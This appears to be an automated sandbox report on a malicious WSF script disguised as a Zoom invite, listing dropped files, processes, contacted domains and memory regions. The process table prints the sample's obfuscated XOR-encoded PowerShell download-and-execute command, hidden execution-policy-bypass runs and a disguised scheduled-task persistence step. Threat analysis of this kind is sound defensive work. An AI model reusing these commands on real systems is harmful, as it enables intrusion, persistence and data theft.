Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Zoom_Invite.call-660194855683.wsf
|
HTML document, Non-ISO extended-ASCII text, with very long lines (932), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3cyayuch.4lo.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cencv1px.4vq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hcuy3yc4.mnu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ooigou4p.fde.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qpprcqr0.niu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wrb0ia5w.0m2.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zoom_Invite.call-660194855683.wsf"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = InvOkE-eXpreSSion ( ( [char[]] (62 , 72,39,61 ,83 ,
127,66,50,84 , 127 , 61 , 33 , 62, 72, 95, 58, 39, 58 , 62 ,72 ,49 , 61,77 , 55, 85, 88,80, 61, 33 , 62, 72 ,95 ,94, 58, 39,58
,62, 72, 95,49, 61 , 127 ,89,78 , 58 ,84,127,78,52 , 77 , 61, 33, 62,74 ,91 , 89 , 39 ,61, 127 , 88 , 89 ,86, 61, 33,62 ,98,98,
58 ,39 ,58, 62, 74, 91 , 89 , 49, 61, 83, 127,84, 61,33, 62,72,85,58, 39 ,58 , 62 ,98 , 98 ,49,61,78,51 , 52, 94 ,85 ,77 ,84,
86 , 85,61,33, 62, 96 , 96, 39 , 61 ,85, 90,42 , 50 ,60 ,50 ,61 ,61 , 114,110 , 110 , 106, 105,32, 53, 53 , 106,123 ,105,
110 , 127,52,127,127, 53, 104, 53,40, 92,94,96,126, 53, 42, 61, 61,51 , 61 , 52,72, 127 ,74,86 , 91, 89 , 127 ,50,61,85 ,90,42,
50, 60, 61 ,54 , 61, 91 ,94, 73,78 , 72, 83 ,84 ,93,61,51, 33 ,115 ,127,98 , 50,62,72 ,95, 94 , 49 , 62,72 , 85 , 49, 62 ,96
, 96 , 51 ) | %{[char] ( $_-BXOR '0x1a' ) } )-JOIN'') ; powershell $ReDrO"
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "MSFT_ScheduledTask (TaskName = "MicroSoftVisualsUpdater", TaskPath
= "\")"
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 6 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ALBANIAH3CKER.WORK.GD
|
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.97.3
|
|
|
|
ALBANIAH3CKER.WORK.GD
|
94.198.50.33
|
|
|
|
api.telegram.org
|
149.154.167.220
|
|
|
|
api.ipify.org
|
104.26.12.205
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
94.198.50.33
|
ALBANIAH3CKER.WORK.GD
|
Russian Federation
|
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
2A51000
|
trusted library allocation
|
page read and write
|
|
|
|
2095DA01000
|
heap
|
page read and write
|
||
|
CC0000
|
heap
|
page read and write
|
||
|
28281860000
|
heap
|
page read and write
|
||
|
2A70000
|
heap
|
page execute and read and write
|
||
|
4F50000
|
heap
|
page execute and read and write
|
||
|
213558E0000
|
heap
|
page read and write
|
||
|
2095DBB5000
|
heap
|
page read and write
|
||
|
15184FE000
|
stack
|
page read and write
|
||
|
4F1E000
|
stack
|
page read and write
|
||
|
D51000
|
heap
|
page read and write
|
||
|
F50000
|
heap
|
page read and write
|
||
|
21357350000
|
heap
|
page read and write
|
||
|
21355840000
|
heap
|
page read and write
|
||
|
53DE000
|
stack
|
page read and write
|
||
|
213558E6000
|
heap
|
page read and write
|
||
|
60C4000
|
trusted library allocation
|
page read and write
|
||
|
F03000
|
trusted library allocation
|
page read and write
|
||
|
5CDE000
|
stack
|
page read and write
|
||
|
D7C000
|
heap
|
page read and write
|
||
|
28281730000
|
heap
|
page read and write
|
||
|
4FF0000
|
heap
|
page read and write
|
||
|
28A03FF000
|
stack
|
page read and write
|
||
|
5F60000
|
trusted library allocation
|
page read and write
|
||
|
21355913000
|
heap
|
page read and write
|
||
|
C83000
|
trusted library allocation
|
page execute and read and write
|
||
|
7CB000
|
stack
|
page read and write
|
||
|
21355810000
|
heap
|
page read and write
|
||
|
21355B15000
|
heap
|
page read and write
|
||
|
5F66000
|
trusted library allocation
|
page read and write
|
||
|
CB4000
|
trusted library allocation
|
page read and write
|
||
|
B90000
|
heap
|
page read and write
|
||
|
21355B1E000
|
heap
|
page read and write
|
||
|
213558B8000
|
heap
|
page read and write
|
||
|
2095DBBD000
|
heap
|
page read and write
|
||
|
539E000
|
stack
|
page read and write
|
||
|
282818C3000
|
heap
|
page read and write
|
||
|
BE0000
|
heap
|
page read and write
|
||
|
FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
CE279FB000
|
stack
|
page read and write
|
||
|
28A00FF000
|
stack
|
page read and write
|
||
|
54DE000
|
stack
|
page read and write
|
||
|
2A8F000
|
trusted library allocation
|
page read and write
|
||
|
2095F88C000
|
heap
|
page read and write
|
||
|
1080000
|
heap
|
page execute and read and write
|
||
|
6110000
|
trusted library allocation
|
page read and write
|
||
|
1135000
|
trusted library allocation
|
page read and write
|
||
|
CE270FE000
|
stack
|
page read and write
|
||
|
10B0000
|
heap
|
page read and write
|
||
|
D5E000
|
heap
|
page read and write
|
||
|
2095DA4B000
|
heap
|
page read and write
|
||
|
CF8000
|
heap
|
page read and write
|
||
|
2F18000
|
trusted library allocation
|
page read and write
|
||
|
2095D990000
|
heap
|
page read and write
|
||
|
289F98A000
|
stack
|
page read and write
|
||
|
28A04FE000
|
stack
|
page read and write
|
||
|
29A8000
|
trusted library allocation
|
page read and write
|
||
|
521E000
|
stack
|
page read and write
|
||
|
5A1E000
|
stack
|
page read and write
|
||
|
F12000
|
trusted library allocation
|
page read and write
|
||
|
28281AF0000
|
heap
|
page read and write
|
||
|
C94000
|
trusted library allocation
|
page read and write
|
||
|
525E000
|
stack
|
page read and write
|
||
|
1060000
|
trusted library allocation
|
page execute and read and write
|
||
|
112E000
|
stack
|
page read and write
|
||
|
2095DB90000
|
heap
|
page read and write
|
||
|
B40000
|
heap
|
page read and write
|
||
|
CF9000
|
heap
|
page read and write
|
||
|
CB3000
|
trusted library allocation
|
page execute and read and write
|
||
|
CE278FE000
|
stack
|
page read and write
|
||
|
501E000
|
stack
|
page read and write
|
||
|
2095F530000
|
heap
|
page read and write
|
||
|
3A81000
|
trusted library allocation
|
page read and write
|
||
|
C84000
|
trusted library allocation
|
page read and write
|
||
|
F10000
|
trusted library allocation
|
page read and write
|
||
|
29EF000
|
stack
|
page read and write
|
||
|
A3B000
|
stack
|
page read and write
|
||
|
FE0000
|
heap
|
page read and write
|
||
|
2095F880000
|
heap
|
page read and write
|
||
|
B70000
|
heap
|
page read and write
|
||
|
5810000
|
trusted library allocation
|
page read and write
|
||
|
2A30000
|
heap
|
page read and write
|
||
|
CE26FFF000
|
stack
|
page read and write
|
||
|
FBF000
|
stack
|
page read and write
|
||
|
CC8000
|
heap
|
page read and write
|
||
|
BDE000
|
stack
|
page read and write
|
||
|
2095F88C000
|
heap
|
page read and write
|
||
|
CE275FD000
|
stack
|
page read and write
|
||
|
4C1E000
|
stack
|
page read and write
|
||
|
1130000
|
trusted library allocation
|
page read and write
|
||
|
6300000
|
trusted library allocation
|
page execute and read and write
|
||
|
28A06FB000
|
stack
|
page read and write
|
||
|
505E000
|
stack
|
page read and write
|
||
|
CD0000
|
trusted library allocation
|
page read and write
|
||
|
CE276FF000
|
stack
|
page read and write
|
||
|
2095F881000
|
heap
|
page read and write
|
||
|
D28000
|
heap
|
page read and write
|
||
|
5BDC000
|
stack
|
page read and write
|
||
|
105D000
|
stack
|
page read and write
|
||
|
519D000
|
stack
|
page read and write
|
||
|
1090000
|
heap
|
page read and write
|
||
|
2095DBB0000
|
heap
|
page read and write
|
||
|
5730000
|
heap
|
page read and write
|
||
|
2095F888000
|
heap
|
page read and write
|
||
|
10EE000
|
stack
|
page read and write
|
||
|
1518AFE000
|
stack
|
page read and write
|
||
|
289FFFE000
|
stack
|
page read and write
|
||
|
5FAC000
|
stack
|
page read and write
|
||
|
EBE000
|
stack
|
page read and write
|
||
|
28281896000
|
heap
|
page read and write
|
||
|
EFE000
|
stack
|
page read and write
|
||
|
5E1D000
|
stack
|
page read and write
|
||
|
D30000
|
heap
|
page read and write
|
||
|
CBB000
|
trusted library allocation
|
page execute and read and write
|
||
|
2095D9C0000
|
heap
|
page read and write
|
||
|
15183FE000
|
stack
|
page read and write
|
||
|
28A05FE000
|
stack
|
page read and write
|
||
|
15186FE000
|
stack
|
page read and write
|
||
|
CB7000
|
trusted library allocation
|
page execute and read and write
|
||
|
282832F0000
|
heap
|
page read and write
|
||
|
B75000
|
heap
|
page read and write
|
||
|
3A51000
|
trusted library allocation
|
page read and write
|
||
|
FD0000
|
trusted library allocation
|
page read and write
|
||
|
5D1C000
|
stack
|
page read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
2095DA33000
|
heap
|
page read and write
|
||
|
CA6000
|
trusted library allocation
|
page execute and read and write
|
||
|
15182FB000
|
stack
|
page read and write
|
||
|
2095DBBD000
|
heap
|
page read and write
|
||
|
4FF3000
|
heap
|
page read and write
|
||
|
4FD0000
|
heap
|
page read and write
|
||
|
60B0000
|
heap
|
page read and write
|
||
|
CB0000
|
trusted library allocation
|
page read and write
|
||
|
1070000
|
trusted library allocation
|
page read and write
|
||
|
2A81000
|
trusted library allocation
|
page read and write
|
||
|
5760000
|
heap
|
page read and write
|
||
|
DB2000
|
heap
|
page read and write
|
||
|
2135591D000
|
heap
|
page read and write
|
||
|
5A5E000
|
stack
|
page read and write
|
||
|
D14000
|
heap
|
page read and write
|
||
|
59DE000
|
stack
|
page read and write
|
||
|
5299000
|
stack
|
page read and write
|
||
|
CE277FF000
|
stack
|
page read and write
|
||
|
4B8E000
|
stack
|
page read and write
|
||
|
CE272FF000
|
stack
|
page read and write
|
||
|
2095DBBD000
|
heap
|
page read and write
|
||
|
60AE000
|
stack
|
page read and write
|
||
|
551E000
|
stack
|
page read and write
|
||
|
28281810000
|
heap
|
page read and write
|
||
|
C90000
|
trusted library allocation
|
page read and write
|
||
|
289FDFF000
|
stack
|
page read and write
|
||
|
CF0000
|
heap
|
page read and write
|
||
|
4FDE000
|
stack
|
page read and write
|
||
|
55DE000
|
stack
|
page read and write
|
||
|
2095D980000
|
heap
|
page read and write
|
||
|
CE26EFA000
|
stack
|
page read and write
|
||
|
B30000
|
heap
|
page read and write
|
||
|
C6E000
|
stack
|
page read and write
|
||
|
7FD10000
|
trusted library allocation
|
page execute and read and write
|
||
|
CE0000
|
heap
|
page read and write
|
||
|
60F5000
|
trusted library allocation
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
4A8C000
|
stack
|
page read and write
|
||
|
CF6000
|
heap
|
page read and write
|
||
|
5A9E000
|
stack
|
page read and write
|
||
|
21355B10000
|
heap
|
page read and write
|
||
|
2095DBB9000
|
heap
|
page read and write
|
||
|
2095F88C000
|
heap
|
page read and write
|
||
|
C8C000
|
stack
|
page read and write
|
||
|
F00000
|
trusted library allocation
|
page read and write
|
||
|
28281868000
|
heap
|
page read and write
|
||
|
289FCFF000
|
stack
|
page read and write
|
||
|
C70000
|
trusted library allocation
|
page read and write
|
||
|
213558B0000
|
heap
|
page read and write
|
||
|
5B9E000
|
stack
|
page read and write
|
||
|
C25000
|
heap
|
page read and write
|
||
|
28A02FD000
|
stack
|
page read and write
|
||
|
2095D9C7000
|
heap
|
page read and write
|
||
|
53DF000
|
stack
|
page read and write
|
||
|
CBD000
|
trusted library allocation
|
page execute and read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
1518BFE000
|
stack
|
page read and write
|
||
|
CE273FF000
|
stack
|
page read and write
|
||
|
F57000
|
heap
|
page read and write
|
||
|
3A59000
|
trusted library allocation
|
page read and write
|
||
|
4F9C000
|
stack
|
page read and write
|
||
|
CA0000
|
trusted library allocation
|
page read and write
|
||
|
1518CFB000
|
stack
|
page read and write
|
||
|
F2B000
|
trusted library allocation
|
page execute and read and write
|
||
|
52D0000
|
heap
|
page execute and read and write
|
||
|
10B6000
|
heap
|
page read and write
|
||
|
15189FE000
|
stack
|
page read and write
|
||
|
28281AF5000
|
heap
|
page read and write
|
||
|
5F69000
|
trusted library allocation
|
page read and write
|
||
|
6100000
|
trusted library allocation
|
page read and write
|
||
|
CAA000
|
trusted library allocation
|
page execute and read and write
|
||
|
4ED0000
|
trusted library allocation
|
page read and write
|
||
|
B37000
|
stack
|
page read and write
|
||
|
F1A000
|
trusted library allocation
|
page execute and read and write
|
||
|
F16000
|
trusted library allocation
|
page execute and read and write
|
||
|
299E000
|
stack
|
page read and write
|
||
|
C20000
|
heap
|
page read and write
|
||
|
1140000
|
heap
|
page read and write
|
||
|
AF8000
|
stack
|
page read and write
|
||
|
15187FF000
|
stack
|
page read and write
|
||
|
5740000
|
heap
|
page read and write
|
||
|
2095F883000
|
heap
|
page read and write
|
||
|
28281AFE000
|
heap
|
page read and write
|
||
|
599D000
|
stack
|
page read and write
|
||
|
28281830000
|
heap
|
page read and write
|
||
|
2095DBBD000
|
heap
|
page read and write
|
||
|
561E000
|
stack
|
page read and write
|
||
|
4F9E000
|
stack
|
page read and write
|
||
|
289E000
|
stack
|
page read and write
|
||
|
2A2D000
|
stack
|
page read and write
|
||
|
F40000
|
trusted library allocation
|
page read and write
|
||
|
21355820000
|
heap
|
page read and write
|
||
|
6200000
|
heap
|
page read and write
|
||
|
F27000
|
trusted library allocation
|
page execute and read and write
|
||
|
581E000
|
trusted library allocation
|
page read and write
|
||
|
282818AD000
|
heap
|
page read and write
|
||
|
2095F883000
|
heap
|
page read and write
|
||
|
54DE000
|
stack
|
page read and write
|
||
|
6203000
|
heap
|
page read and write
|
There are 215 hidden memdumps, click here to show them.